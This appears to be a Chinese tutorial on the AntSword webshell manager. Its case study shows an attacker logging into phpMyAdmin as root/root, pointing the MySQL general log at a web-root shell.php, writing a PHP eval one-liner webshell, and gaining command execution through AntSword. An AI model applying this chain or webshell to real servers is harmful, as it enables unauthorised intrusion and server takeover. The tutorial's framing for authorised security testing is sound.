Web安全-AntSword(中国蚁剑)Webshell管理工具使用

这篇具有很好参考价值的文章主要介绍了Web安全-AntSword(中国蚁剑)Webshell管理工具使用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

01 工具下载地址

https://github.com/AntSwordProject/

蚂剑工具的下载分为两个部分,一个是项目核心源码antSword,另一个是加载器AntSword-Loader。我们依次进行下载,并且进行说明

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

先点击进入antSword,点击页面右侧"releases",进入工具的源码下载页面进行源码下载。

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全
而后点击进入AntSword-Loader,点击页面右侧"releases",进入加载器下载页面,根据操作系统类型选择对应的加载器,此处以Windows举例。

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

下载完毕后,解压加载器的压缩包,双击打开AntSword.exe,出现如下图界面后,加载对应antSword地址即可

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全



02 工具介绍




AntSword是一个开源、跨平台的webshell管理工具,旨在满足渗透测试人员、具有权限和/或授权的安全研究人员以及网站管理员的需求。


03 使用案例

攻击者成功利用弱口令root/root登录phpmyadmin 后台后,利用 SQL 语句 show variables like ‘%general%’;查看general log 是否开启

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全


若发现日志读写功能关闭,于是使用 SQL 语句:SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’;打开general_log 日志读写功能。

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

打开日志读写功能后,根据图中 general_log_file 中的绝对路径制作一个木马文件:SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

接着往 shell.php 写入 SELECT '<?php eval($_POST["jkxy"]);?>

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

利用中国蚁剑工具连接一句话 shell.php,双击运行AntSword.exe,等初始化完成后,再双击“AntSword.exe”即可正常启动,页面功能如图所示:

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

shell列表区鼠标右键选择添加webshell数据:

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全


配置相关参数信息后连接测试成功,打开虚拟终端,输入命令 whoami,发现命令执行成功。

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全
Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全

Web安全-AntSword(中国蚁剑)Webshell管理工具使用,Web安全,web安全,安全
至此攻击者通过蚂剑连接Webshell,成功获取服务器权限,后续的执行命令、文件管理、其他功能都在界面中可以进行选择:

这里对功能模块做一个简单的介绍说明:文章来源地址https://www.toymoban.com/news/detail-518869.html

序号 模块名称 功能介绍
1 文件管理 文件管理是 AntSword 的几大职能之一,主要涉及文件的逻辑组织和物理组织,目录的结构和管理。
2 虚拟终端 虚拟终端是 AntSword 的几大职能之一,利用 Shell 模拟终端,在远程计算机上运行应用程序,就像他们是坐在这台计算机前面一样。
3 数据库管理 数据库管理是 AntSword 的几大职能之一,通过图形化的管理界面,利用 Shell 转发功能,对远程服务器上的数据库进行快速、高效的管理
4 文件管理 可视化管理文件的增删改查等操作
6 插件市场 插件开发者将插件提交至「插件市场」后,使用者可轻松获取并使用插件。

04 参考资料

蚁剑官方文档

https://www.yuque.com/antswordproject/antsword/lmwppk

到了这里,关于Web安全-AntSword(中国蚁剑)Webshell管理工具使用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web安全-Godzilla(哥斯拉)Webshell管理工具使用

    点击页面右侧\\\"releases\\\",进入工具的版本下载页面。 在个人终端安装JDK1.8环境的情况下,下载jar包后打开即可 Payload类型 运行环境要求 JavaDynamicPayload java1.0及以上 CShapDynamicPayload .net2.0及以上 PhpDynamicPayload 4.3.0及以上 AspDynamicPayload 全版本 哥斯拉由Java语言开发,内置了3种Paylo

    2024年02月13日
    浏览(38)
  • 中国蚁剑AntSword实战

    蚁剑加载器:AntSword-Loader 首次打开加载器时,界面如下图所示: 点击「初始化」按钮,选择蚁剑的源代码目录,或者选择一个空目录作为蚁剑的工作目录,加载器会自动下载源代码。待提示初始化完毕时,重新打开蚁剑加载器,即可看到蚁剑的主界面

    2023年04月10日
    浏览(36)
  • 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

    中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 WebShell可以理解为网页中的 木马程序 ,通过植入到你的web站点,在web页面上的操作, 控制你的计算机 操作系统,文件,权限,任意命令执行。

    2024年02月13日
    浏览(42)
  • 网络安全——Webshell管理工具

    一、什么是Webshell    二、中国菜刀的使用 从靶机(IP:192.168.30.35)的DVWA网站上传文件, 1、菜刀的界面 2、新建一个“一句话木马文件”,名字为phpma.php 3、登录靶机的DVWA网站,调成Low级别,并到File Upload关卡,上传刚刚创建好的phpma.php文件, 注:要把路径记住     3、在菜

    2024年02月02日
    浏览(47)
  • Webshell管理工具

    Webshell是以ASP、PHP、JSP或者CGl等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。 Webshell使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。 正因如此,也有

    2024年02月13日
    浏览(56)
  • Shell管理工具流量分析-上(菜刀、蚁剑、冰蝎2.0流量分析)&入侵检测、应急响应资料整理

    本文将会从攻防的角度分析常用 webshell 管理工具(菜刀、蚁剑、冰蝎2.0,冰蝎3.0、哥斯拉将在下篇介绍)的流量特点,后半部分会整理一些有关 webshell 入侵检测和应急响应的文章 先从最简单的开始吧,菜刀也算是比较早的 webshell 管理工具了,加密方式比较简单,这里分析

    2024年02月02日
    浏览(46)
  • 【网络安全】文件上传漏洞及中国蚁剑安装

    文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。如常见的头像上传,图片上传,oa 办公文件上传,媒体上传,允许用户上传文件,如果过滤不严格,恶意用户利用文件上传漏洞,

    2024年02月04日
    浏览(52)
  • webshell管理工具-哥斯拉( Godzilla)的安装和基础使用

    哥斯拉相对于其他的webshell管理工具有过之而无不及: 哥斯拉全部类型的shell均过市面所有静态查杀 哥斯拉流量加密过市面全部流量waf 哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的 可见其强大之处,具体介绍可以在github上面去了解:https://github.com/BeichenDream/Godzilla 安装及其简

    2024年02月09日
    浏览(41)
  • webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)

    冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备 难以 检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。 gi

    2024年02月02日
    浏览(53)
  • 【webshell工具——蚁剑】蚁剑安装使用教程

    本篇内容主要为webshell工具蚁剑的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。 [步骤1] 蚁剑工具的下载 废话不多说直接放链接 加载(启动)器: 链接: https://github.com/AntSwordProject/AntSword-Loader 加速器选

    2024年02月07日
    浏览(90)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包